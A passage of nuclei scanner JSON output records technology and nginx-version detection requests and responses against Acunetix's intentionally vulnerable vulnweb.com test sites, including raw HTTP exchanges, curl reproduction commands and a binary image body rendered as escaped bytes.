more.\\u003c/p\\u003e\\n\\u003c/div\\u003e\\n\\u003c/center\\u003e\\n\\n\\u003c/body\\u003e\\n\\u003c/html\\u003e\\n\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:34:56.613234253Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.1.2 Safari/605.1.15' 'http://vulnweb.com'\",\"matcher-status\":true}\n{\"template\":\"http/technologies/tech-detect.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/tech-detect\",\"template-id\":\"tech-detect\",\"template-path\":\"/home/rengine/nuclei-templates/http/technologies/tech-detect.yaml\",\"info\":{\"name\":\"Wappalyzer Technology Detection\",\"author\":[\"hakluke\",\"righettod\"],\"tags\":[\"tech\"],\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"nginx\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/login\",\"path\":\"/login\",\"matched-at\":\"http://testphp.vulnweb.com/login\",\"request\":\"GET /login HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.1.2 Safari/605.1.04\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 404 Not Found\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html\\r\\nDate: Wed, 13 Nov 2024 02:34:56 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\u003chtml\\u003e\\r\\n\\u003chead\\u003e\\u003ctitle\\u003e404 Not Found\\u003c/title\\u003e\\u003c/head\\u003e\\r\\n\\u003cbody\\u003e\\r\\n\\u003ccenter\\u003e\\u003ch1\\u003e404 Not Found\\u003c/h1\\u003e\\u003c/center\\u003e\\r\\n\\u003chr\\u003e\\u003ccenter\\u003enginx/1.19.0\\u003c/center\\u003e\\r\\n\\u003c/body\\u003e\\r\\n\\u003c/html\\u003e\\r\\n\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:34:56.613760791Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.1.2 Safari/605.1.04' 'http://testphp.vulnweb.com/login'\",\"matcher-status\":true}\n{\"template\":\"http/technologies/nginx/nginx-version.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/nginx-version\",\"template-id\":\"nginx-version\",\"template-path\":\"/home/rengine/nuclei-templates/http/technologies/nginx/nginx-version.yaml\",\"info\":{\"name\":\"Nginx version detect\",\"author\":[\"philippedelteil\",\"daffainfo\"],\"tags\":[\"tech\",\"nginx\"],\"description\":\"Some nginx servers have the version on the response header. Useful when you need to find specific CVEs on your targets.\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"type\":\"http\",\"host\":\"www.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://www.vulnweb.com\",\"matched-at\":\"http://www.vulnweb.com\",\"extracted-results\":[\"nginx/1.19.0\"],\"request\":\"GET / HTTP/1.1\\r\\nHost: www.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:44.0) Gecko/20100101 Firefox/44.0\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html\\r\\nDate: Wed, 13 Nov 2024 02:34:56 GMT\\r\\nEtag: W/\\\"5f1fedf1-fb2\\\"\\r\\nLast-Modified: Tue, 28 Jul 2020 09:20:49 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\u003c!DOCTYPE html PUBLIC \\\"-//W3C//DTD XHTML 1.0 Transitional//EN\\\" \\\"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd\\\"\\u003e\\n\\u003chtml xmlns=\\\"http://www.w3.org/1999/xhtml\\\"\\u003e\\n\\u003chead\\u003e\\n\\u003cmeta http-equiv=\\\"Content-Type\\\" content=\\\"text/html; charset=utf-8\\\" /\\u003e\\n\\u003ctitle\\u003eAcunetix Web Vulnerability Scanner - Test websites\\u003c/title\\u003e\\n\\u003cstyle type=\\\"text/css\\\"\\u003e\\n\\u003c!--\\n@import url(\\\"style.css\\\");\\n--\\u003e\\n\\u003c/style\\u003e\\n\\u003c/head\\u003e\\n\\u003cbody\\u003e\\n\\n\\n\\u003ccenter\\u003e\\n\\u003cbr\\u003e\\n\\n\\u003ca href='https://www.acunetix.com/'\\u003e\\u003cimg src='acunetix-logo.png' border='0' alt=\\\"Acunetix website security\\\"\\u003e\\u003c/a\\u003e\\u003cbr\\u003e\\u003cbr\\u003e\\n\\u003cdiv\\u003eVulnerable test websites for \\u003ca href='https://www.acunetix.com/vulnerability-scanner/'\\u003eAcunetix Web Vulnerability Scanner\\u003c/a\\u003e.\\u003c/div\\u003e\\n\\n\\u003ctable id=\\\"one-column-emphasis\\\" summary=\\\"Acunetix test websites\\\" style=\\\"width:60%\\\"\\u003e\\n \\u003ccolgroup\\u003e\\n \\t\\u003ccol\\u003e\\n \\u003c/colgroup\\u003e\\n \\u003cthead\\u003e\\n \\t\\u003ctr style=\\\"font-size:14px\\\"\\u003e\\n \\t\\u003cth scope=\\\"col\\\"\\u003e\\u003cb\\u003eName\\u003c/b\\u003e\\u003c/th\\u003e\\n \\u003cth scope=\\\"col\\\"\\u003e\\u003cb\\u003eURL\\u003c/b\\u003e\\u003c/th\\u003e\\n \\u003cth scope=\\\"col\\\"\\u003e\\u003cb\\u003eTechnologies\\u003c/b\\u003e\\u003c/th\\u003e\\n\\t\\t\\t\\u003cth scope=\\\"col\\\"\\u003e\\u003cb\\u003eResources\\u003c/b\\u003e\\u003c/th\\u003e\\n \\u003c/tr\\u003e\\n \\u003c/thead\\u003e\\n \\u003ctbody\\u003e\\n \\t\\u003ctr style=\\\"font-size:14px\\\"\\u003e\\n \\t\\u003ctd\\u003eSecurityTweets\\u003c/td\\u003e\\n \\u003ctd\\u003e\\u003ca href='http://testhtml5.vulnweb.com/'\\u003ehttp://testhtml5.vulnweb.com\\u003c/a\\u003e\\u003c/td\\u003e\\n \\u003ctd\\u003enginx, Python, Flask, CouchDB\\u003c/td\\u003e\\n\\t\\t\\t\\u003ctd\\u003e\\u003ca href='https://www.acunetix.com/vulnerability-scanner/html5-website-security/'\\u003eReview\\u003c/a\\u003e Acunetix HTML5 scanner or \\u003ca href='https://www.acunetix.com/vulnerability-scanner/crawling-html5-javascript-websites/'\\u003elearn more\\u003c/a\\u003e on the topic.\\u003c/td\\u003e\\n \\u003c/tr\\u003e\\n \\t\\u003ctr style=\\\"font-size:14px\\\"\\u003e\\n \\t\\u003ctd\\u003eAcuart\\u003c/td\\u003e\\n \\u003ctd\\u003e\\u003ca href='http://testphp.vulnweb.com/'\\u003ehttp://testphp.vulnweb.com\\u003c/a\\u003e\\u003c/td\\u003e\\n \\u003ctd\\u003eApache, PHP, MySQL\\u003c/td\\u003e\\n\\t\\t\\t\\u003ctd\\u003e\\u003ca href='https://www.acunetix.com/vulnerability-scanner/php-security-scanner/'\\u003eReview\\u003c/a\\u003e Acunetix PHP scanner or \\u003ca href='https://www.acunetix.com/blog/articles/prevent-sql-injection-vulnerabilities-in-php-applications/'\\u003elearn more\\u003c/a\\u003e on the topic.\\u003c/td\\u003e\\n \\u003c/tr\\u003e\\n \\t\\u003ctr style=\\\"font-size:14px\\\"\\u003e\\n \\t\\u003ctd\\u003eAcuforum\\u003c/td\\u003e\\n \\u003ctd\\u003e\\u003ca href='http://testasp.vulnweb.com/'\\u003ehttp://testasp.vulnweb.com\\u003c/a\\u003e\\u003c/td\\u003e\\n \\u003ctd\\u003eIIS, ASP, Microsoft SQL Server\\u003c/td\\u003e\\n\\t\\t\\t\\u003ctd\\u003e\\u003ca href='https://www.acunetix.com/vulnerability-scanner/sql-injection/'\\u003eReview\\u003c/a\\u003e Acunetix SQL scanner or \\u003ca href='https://www.acunetix.com/websitesecurity/sql-injection/'\\u003elearn more\\u003c/a\\u003e on the topic.\\u003c/td\\u003e\\n \\u003c/tr\\u003e\\n \\t\\u003ctr style=\\\"font-size:14px\\\"\\u003e\\n \\t\\u003ctd\\u003eAcublog\\u003c/td\\u003e\\n \\u003ctd\\u003e\\u003ca href='http://testaspnet.vulnweb.com/'\\u003ehttp://testaspnet.vulnweb.com\\u003c/a\\u003e\\u003c/td\\u003e\\n \\u003ctd\\u003eIIS, ASP.NET, Microsoft SQL Server\\u003c/td\\u003e\\n\\t\\t\\t\\u003ctd\\u003e\\u003ca href='https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/'\\u003eReview\\u003c/a\\u003e Acunetix network scanner or \\u003ca href='https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/'\\u003elearn more\\u003c/a\\u003e on the topic.\\u003c/td\\u003e\\n \\u003c/tr\\u003e\\n\\t\\t\\u003ctr style=\\\"font-size:14px\\\"\\u003e\\n \\t\\u003ctd\\u003eREST API\\u003c/td\\u003e\\n \\u003ctd\\u003e\\u003ca href='http://rest.vulnweb.com/'\\u003ehttp://rest.vulnweb.com/\\u003c/a\\u003e\\u003c/td\\u003e\\n \\u003ctd\\u003eApache, PHP, MySQL\\u003c/td\\u003e\\n\\t\\t\\t\\u003ctd\\u003e\\u003ca href='https://www.acunetix.com/blog/articles/rest-api-security-testing-acunetix/'\\u003eReview\\u003c/a\\u003e Acunetix scanner or \\u003ca href='https://www.acunetix.com/blog/articles/rest-api-security-testing-acunetix/'\\u003elearn more\\u003c/a\\u003e on the topic.\\u003c/td\\u003e\\n \\u003c/tr\\u003e\\n \\u003c/tbody\\u003e\\n\\u003c/table\\u003e\\n\\n\\u003cdiv style=\\\"background-color:lightgray;width:60%;text-align:center;font-size:14px\\\"\\u003e\\n\\u003cp style=\\\"padding-left:140px;padding-right:140px\\\"\\u003e\\u003cb\\u003eWarning\\u003c/b\\u003e: This site hosts intentionally vulnerable web applications. You can use these applications to understand how programming and configuration errors lead to security breaches. We created the site to help you test Acunetix but you may also use it for manual penetration testing or for educational purposes. It will help you learn about vulnerabilities such as SQL Injection, Cross-site Scripting (XSS), Cross-site Request Forgery (CSRF), and many more.\\u003c/p\\u003e\\n\\u003c/div\\u003e\\n\\u003c/center\\u003e\\n\\n\\u003c/body\\u003e\\n\\u003c/html\\u003e\\n\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:34:56.622361079Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:44.0) Gecko/20100101 Firefox/44.0' 'http://www.vulnweb.com'\",\"matcher-status\":true}\n{\"template\":\"http/technologies/tech-detect.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/tech-detect\",\"template-id\":\"tech-detect\",\"template-path\":\"/home/rengine/nuclei-templates/http/technologies/tech-detect.yaml\",\"info\":{\"name\":\"Wappalyzer Technology Detection\",\"author\":[\"hakluke\",\"righettod\"],\"tags\":[\"tech\"],\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"nginx\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/cgi-bin/status\",\"path\":\"/cgi-bin/status\",\"matched-at\":\"http://testphp.vulnweb.com/cgi-bin/status\",\"request\":\"GET /cgi-bin/status HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 11.0) AppleWebKit/602.1.50 (KHTML, like Gecko) Version/9.1.2 Safari/602.1.50\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 404 Not Found\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html; charset=iso-8859-1\\r\\nDate: Wed, 13 Nov 2024 02:34:56 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\u003c!DOCTYPE HTML PUBLIC \\\"-//IETF//DTD HTML 2.0//EN\\\"\\u003e\\n\\u003chtml\\u003e\\u003chead\\u003e\\n\\u003ctitle\\u003e404 Not Found\\u003c/title\\u003e\\n\\u003c/head\\u003e\\u003cbody\\u003e\\n\\u003ch1\\u003eNot Found\\u003c/h1\\u003e\\n\\u003cp\\u003eThe requested URL was not found on this server.\\u003c/p\\u003e\\n\\u003chr\\u003e\\n\\u003caddress\\u003eApache/2.4.46 (Ubuntu) Server at localhost Port 8000\\u003c/address\\u003e\\n\\u003c/body\\u003e\\u003c/html\\u003e\\n\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:34:56.628292385Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 11.0) AppleWebKit/602.1.50 (KHTML, like Gecko) Version/9.1.2 Safari/602.1.50' 'http://testphp.vulnweb.com/cgi-bin/status'\",\"matcher-status\":true}\n{\"template\":\"http/technologies/tech-detect.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/tech-detect\",\"template-id\":\"tech-detect\",\"template-path\":\"/home/rengine/nuclei-templates/http/technologies/tech-detect.yaml\",\"info\":{\"name\":\"Wappalyzer Technology Detection\",\"author\":[\"hakluke\",\"righettod\"],\"tags\":[\"tech\"],\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"nginx\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/pictures/1.jpg.tn\",\"path\":\"/pictures/1.jpg.tn\",\"matched-at\":\"http://testphp.vulnweb.com/pictures/1.jpg.tn\",\"request\":\"GET /pictures/1.jpg.tn HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.146 Safari/537.36\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nContent-Length: 4355\\r\\nAccept-Ranges: bytes\\r\\nContent-Type: application/octet-stream\\r\\nDate: Wed, 13 Nov 2024 02:34:57 GMT\\r\\nEtag: \\\"4dca64a1-1103\\\"\\r\\nLast-Modified: Wed, 11 May 2011 10:27:45 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\ufffd\\ufffd\\ufffd\\ufffd\\u0000\\u0010JFIF\\u0000\\u0001\\u0001\\u0000\\u0000\\u0001\\u0000\\u0001\\u0000\\u0000\\ufffd\\ufffd\\u0000C\\u0000\\u0006\\u0004\\u0005\\u0006\\u0005\\u0004\\u0006\\u0006\\u0005\\u0006\\u0007\\u0007\\u0006\\u0008\\n\\u0010\\n\\n\\t\\t\\n\\u0014\\u000e\\u000f\\u000c\\u0010\\u0017\\u0014\\u0018\\u0018\\u0017\\u0014\\u0016\\u0016\\u001a\\u001d%\\u001f\\u001a\\u001b#\\u001c\\u0016\\u0016 , #\\u0026')*)\\u0019\\u001f-0-(0%()(\\ufffd\\ufffd\\u0000C\\u0001\\u0007\\u0007\\u0007\\n\\u0008\\n\\u0013\\n\\n\\u0013(\\u001a\\u0016\\u001a((((((((((((((((((((((((((((((((((((((((((((((((((\\ufffd\\ufffd\\u0000\\u0011\\u0008\\u0000d\\u0000\\ufffd\\u0003\\u0001\\\"\\u0000\\u0002\\u0011\\u0001\\u0003\\u0011\\u0001\\ufffd\\ufffd\\u0000\\u001b\\u0000\\u0000\\u0002\\u0002\\u0003\\u0001\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0006\\u0001\\u0005\\u0003\\u0004\\u0007\\u0002\\ufffd\\ufffd\\u00004\\u0010\\u0000\\u0002\\u0001\\u0003\\u0004\\u0001\\u0003\\u0003\\u0003\\u0003\\u0004\\u0001\\u0005\\u0000\\u0000\\u0000\\u0001\\u0002\\u0003\\u0000\\u0004\\u0011\\u0005\\u0012!1A\\u0006\\u0013Q\\\"a\\ufffd\\u0014q\\ufffd2\\ufffd\\ufffd#BR\\ufffd\\ufffd\\u0016b\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u0000\\u0019\\u0001\\u0000\\u0003\\u0001\\u0001\\u0001\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0001\\u0002\\u0003\\u0000\\u0004\\u0005\\ufffd\\ufffd\\u0000)\\u0011\\u0000\\u0002\\u0002\\u0001\\u0003\\u0002\\u0005\\u0004\\u0003\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0001\\u0002\\u0003\\u0011\\u0004!1\\u0012A\\u0005\\u0013Q\\ufffd\\ufffd2aq\\ufffd\\\"3\\ufffd\\ufffd\\ufffd\\u0000\\u000c\\u0003\\u0001\\u0000\\u0002\\u0011\\u0003\\u0011\\u0000?\\u0000\\ufffd\\u003e\\ufffd\\ufffdn?\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd8ԝB\\ufffdw\\u0018Va\\ufffd9\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd]\\ufffd\\ufffd.\\ufffdH\\ufffdn\\t \\ufffd\\ufffdr2s\\ufffd\\u0006\\ufffd\\ufffdP\\u0003z\\ufffd\\ufffd8\\ufffd\\ufffdj\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u0006$}#\\ufffd\\ufffd\\ufffd\\ufffdW\\t\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd{\\ufffd\\ufffdc ʸʮ\\u003c\\ufffd\\ufffd\\ufffd\\ufffd׹Er\\ufffd\\n/\\ufffdI\\ufffd\\ufffd\\ufffdj\\ufffd\\u0026\\ufffd\\ufffd\\ufffddY\\u0019@\\ufffdW\\ufffd\\ufffd#\\ufffdr\\u003e\\ufffdϚ\\ufffd\\ufffdlN^}\\ufffd\\u0015\\ufffd#3(|g\\ufffdp0rpO\\ufffd\\ufffdf\\ufffd\\ufffd}%%\\ufffd\\u0006kIE\\ufffdf\\ufffd\\u0010\\ufffd\\u0003\\ufffd\\ufffd\\u0007\\u001f\\ufffd\\ufffd\\u0006\\ufffdzf\\ufffd\\ufffd^\\ufffdC%Ƕ\\ufffd\\u0019\\u00140;C\\u001d\\ufffd\\u0018\\ufffd?\\ufffd\\ufffd\\ufffdz\\ufffd\\\\\\\\[\\ufffd\\ufffd\\u00025\\ufffdy.\\\\\\ufffd\\u00169۟\\ufffd8\\u001fڮ\\ufffd?\\ufffd\\u0019L3\\\\\\ufffd\\ufffd\\ufffd\\u0019#\\u00110\\ufffd\\\\x\\ufffd\\ufffd8\\ufffd#\\ufffd\\u001b\\ufffdZ\\u0015Ʃ|\\ufffd\\u001e5 夑\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdդ\\ufffd=\\u003e\\ufffd\\u001bI\\ufffdi\\ufffd;\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\n2\\u0006\\u0007۳\\ufffdO^(\\ufffd\\ufffd\\ufffd\\ufffdb\\ufffdP\\ufffd.\\ufffd\\ufffd_fEUR\\u0002}9\\ufffd\\ufffdr6\\ufffd\\ufffd\\ufffd\\ufffd\\u003ej\\ufffdg\\ufffd$g\\ufffd\\u0017$\\ufffd\\u000e\\ufffd{\\ufffd\\ufffd[\\ufffdL\\ufffd\\ufffd\\ufffd9\\ufffd,sXi\\u0026\\u0014y\\ufffd\\ufffd\\ufffdT\\ufffdb*E\\u0014VH\\ufffd\\ufffd퍌\\ufffdI,\\ufffd\\ufffd\\ufffdE\\ufffd\\ufffd0\\u0007\\u0007\\ufffd\\ufffd\\ufffd?\\ufffd\\u0015\\ufffd;\\ufffd\\ufffd\\u0017]\\ufffdJ\\ufffdX\\ufffd\\ufffdFd\\u0000\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd$`c\\ufffd\\ufffd2\\ufffd0գ\\ufffd7\\u0016\\ufffdnח\\\"ј;2\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdp;'9\\u0018\\ufffdz\\ufffd\\u0014\\ufffd/\\ufffd\\ufffd\\ufffd\\ufffd[)\\ufffd3Z\\ufffdorEY\\u000c\\ufffd\\u001e|\\u0011\\ufffdq\\ufffd|\\u001e\\ufffd\\ufffda\\u001e\\ufffdu$-\\u000bJ\\ufffd\\u001f;\\ufffd\\ufffd\\u0000p\\ufffd\\ufffd\\ufffd\\ufffd\\u0001\\ufffdT\\ufffd\\ufffd\\ufffd\\\"\\ufffdM\\ufffd\\ufffd1\\ufffd06\\ufffdۉ\\u0001O\\u0000\\ufffdg\\u001c\\ufffd\\ufffd\\ufffdN\\ufffd\\u003e\\ufffd\\ufffd\\ufffd\\ufffd,\\ufffd]\\ufffd%ܰ\\ufffd\\ufffdH\\u0010s\\ufffdO\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u0015S\\ufffdz\\ufffdi\\ufffd%\\ufffd@\\ufffd\\ufffd@G\\ufffd\\u0007`,@#'\\ufffdC\\ufffd\\ufffd\\ufffd\\ufffdZ\\ufffd\\ufffd\\ufffd:\\ufffd\\ufffdl\\u0004\\ufffdX\\ufffdX\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd.\\u0014\\ufffdA\\ufffdU\\ufffd\\\\6i\\nٱ\\ufffd\\ufffd-~\\\"2ƂDP\\ufffd\\ufffd`\\ufffd\\u0000\\u0003\\ufffd\\u0001\\ufffd\\ufffdV׿\\u0015\\u0014$\\ufffdm\\ufffd\\ufffdIsr\\ufffd0Uf\\ufffd\\ufffd\\u0014\\u0003\\ufffd\\ufffd.\\ufffdsq\\ufffd\\ufffd\\ufffdg\\ufffd\\ufffd\\ufffd]\\ufffd8\\u001fj\\ufffd\\u0006\\ufffd\\ufffdb\\ufffd/,\\ufffd\\u001e\\ufffd\\ufffd]B\\u0015\\\"\\ufffd\\ufffd\\nS\\ufffdp\\ufffd\\ufffd\\u003e3\\ufffd\\u0000\\\\S\\ufffd\\ufffd\\ufffd\\ufffdq\\ufffd6\\ufffdRI[\\u000258\\ufffd\\ufffd\\u0000\\u000b\\ufffd;\\ufffd\\u001d\\ufffd\\ufffd\\ufffd\\ufffdL\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u003cbDxAiJ\\ufffd\\u0026\\ufffdn8\\u000b\\ufffd\\u0007\\ufffd\\ufffd\\ufffd' f\\ufffd\\ufffdC\\ufffd\\ufffd\\ufffd\\ufffd,jR\\u0018\\ufffd\\u0015Oǎ\\u0007\\u0003\\ufffd:\\ufffd\\ufffd\\ufffd+\\u001fO\\ufffdb\\ufffd\\ufffd\\u0017z\\ufffd\\ufffdF\\u0014\\ufffd\\u000bI\\u0003,b1\\ufffdS#$\\u00022\\t\\ufffd3\\ufffdq\\ufffd\\ufffd ^\\u0016$\\ufffd'\\ufffd\\ufffd\\u001e\\ufffdԭ\\ufffd-೾\\ufffdi\\ufffd\\ufffd\\ufffd*\\ufffd\\ufffd\\u0013g\\u00039##\\ufffd\\ufffd\\ufffd\\ufffd5\\ufffd\\ufffd?L\\ufffdH\\ufffd\\u0000D\\ufffd\\ufffdO\\ufffdIw\\ufffd\\u0000S}D\\ufffd\\ufffd\\u0000\\r\\ufffdpz\\ufffd\\ufffd\\u0010\\ufffdA\\ufffdK\\ufffd\\ufffd\\ufffd\\ufffd\\u001a\\ufffda\\ufffdto\\ufffd^\\ufffd\\ufffd\\ufffdv\\ufffd~\\ufffd1\\ufffd\\ufffd\\u0000\\ufffd\\u003c\\ufffd\\u000f\\ufffdU\\\\Zl\\ufffdh\\ufffd%\\ufffd\\u001e񊫊o\\u00004\\ufffd暮\\ufffdKD\\ufffd\\ufffdS\\ufffd\\ufffda\\ufffd,\\ufffd\\\"\\ufffdr\\\\\\u0004\\u001f\\ufffdT\\u001f\\u003c\\u000c\\ufffd\\ufffd\\ufffd\\u001aV\\ufffdK\\ufffd\\ufffd'\\ufffd*qEn\\ufffd\\u0000\\ufffd\\u0014b\\ufffd\\ufffd(\\ufffdՎ\\u000c\\ufffd\\u0018\\ufffd3\\ufffdg\\u0015Ҵ\\ufffd\\u001d,\\\\$\\ufffdE\\ufffd\\ufffd\\ufffd}\\ufffd\\ufffd\\u00021\\ufffdO\\u001d\\ufffdۏ\\ufffd\\ufffd\\ufffd\\u0004]'G\\ufffd\\ufffd\\ufffd\\ufffdx!wH\\ufffd\\u0007j\\ufffd\\ufffd|\\ufffd\\ufffd\\ufffd\\ufffdf\\ufffd\\u0017\\ufffd\\ufffd\\ufffd\\ufffd\\u0004wz\\\\x\\u0018B\\ufffd\\ufffd\\ufffd\\u0014dy\\ufffd\\ufffdG\\ufffd\\ufffd-\\ufffd\\ufffdr\\ufffd\\ufffd\\ufffd\\u003eL\\ufffdMR\\ufffd!\\ufffd\\ufffd\\ufffdKh\\ufffd$\\u0026]\\ufffdI\\ufffd\\u0002\\n\\ufffds\\ufffd\\ufffd?ǐ+\\ufffdkz5\\ufffd\\ufffd\\ufffd\\ufffd=\\ufffdR\\ufffd\\u0007!b\\ufffdNJ\\ufffd\\u001b\\ufffd\\u001dq\\ufffds\\ufffd8\\u00184\\ufffdt\\ufffdm\\ufffd\\ufffd\\ufffd\\u00067\\ufffdwb\\ufffd\\t`\\ufffd\\ufffd\\ufffd{\\u0001\\ufffd\\ufffd\\ufffd\\ufffdI\\ufffd\\ufffd\\u001e\\ufffd\\ufffd\\u000f\\ufffd9\\ufffd,c\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdq\\ufffd$\\u0003\\ufffd\\u001dW.\\ufffdR\\ufffd\\nO+\\ufffd\\ufffd4\\ufffd\\u0017\\u0008\\ufffd\\ufffd\\u0018\\ufffdr.\\rx\\ufffd\\ufffd\\ufffd!\\u0014\\ufffd\\u0000;=U\\ufffdiw6:\\ufffd\\ufffdȻ\\ufffd\\u0019L{\\ufffdK#\\u0010q\\ufffd\\ufffd`\\ufffd:6\\u000eFA\\u001eE8zwVKM6In\\ufffdnj2\\ufffd]Ý\\ufffd\\ufffd\\ufffdDn8\\u0000\\ufffd\\u003eOc5\\u0018K`\\ufffd:\\ufffd\\ufffdv\\ufffd|Q\\ufffd^\\u0018/\\u00034\\ufffd$\\n\\u0000\\ufffd\\u0007\\u0005\\ufffd\\u000c\\u001bpny\\ufffd\\u003c\\u001a痷r\\\\\\\\\\u003c\\ufffd9wc\\ufffd\\ufffd\\u0026\\ufffdk[\\ufffd\\ufffd\\u0006Q\\\"\\ufffdޥ\\\\0\\ufffd\\ufffdu\\ufffd\\ufffd\\u001e\\u0008\\ufffdWf\\ufffd\\u001cD\\u0005\\ufffd\\ufffd\\ufffdOep\\ufffd[?\\ufffd(\\ufffd\\ufffd\\ufffd~\\ufffd\\ufffd\\ufffd\\ufffdyđ\\ufffdwl\\ufffdVf6\\ufffd\\ufffd+\\ufffd\\ufffd\\ufffd\\ufffd?\\ufffds\\ufffd\\ufffd\\ufffd)\\u0017LA-\\ufffd1\\ufffd\\u003c\\ufffd\\ufffd\\u0026\\ufffd\\ufffd\\u0019\\ufffd\\ufffd\\u0001\\ufffd\\ufffd8ìZ\\ufffd@\\ufffd~\\ufffd\\u000c\\ufffd!̲\\ufffdk\\ufffd\\ufffd\\ufffd/dp{㓎\\ufffd\\t\\ufffd\\u0000%\\ufffd\\ufffda\\ufffd\\u001d6\\u001d2\\ufffd\\ufffd\\ufffd0̒\\ufffd\\ufffdG\\u0004\\ufffd\\ufffdC\\u0002\\u0001\\ufffd 